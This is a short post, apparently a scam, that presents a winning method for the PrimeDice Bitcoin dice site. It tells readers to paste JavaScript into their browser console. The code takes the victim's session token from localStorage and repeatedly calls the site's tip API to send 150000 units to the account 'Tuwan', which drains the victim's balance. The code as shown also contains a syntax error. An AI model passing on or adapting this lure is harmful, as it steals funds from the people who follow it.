1. Login to your PrimeDice account 2. Deposit any amount of BTC you want (Deposit is not needed!) 3. Choose these settings : x2 Payout 4. Then COPY the following code and paste it on the Console! (Right click anywhere and open Inspect Element then go to console and paste the code and hit ENTER) //-----------code begin -------// var amount = 150000, users = ["Tuwan",:]; function tip(username, amount) { try { $.post("https://api.primedice.com/api/tip?access_token=" + localStorage.getItem('token'), { username: username, amount: amount }, function(d) { tipped++; tip(users[tipped], amount); }); } catch(err) { return; } } var tipped = 0; tip(users[tipped], amount);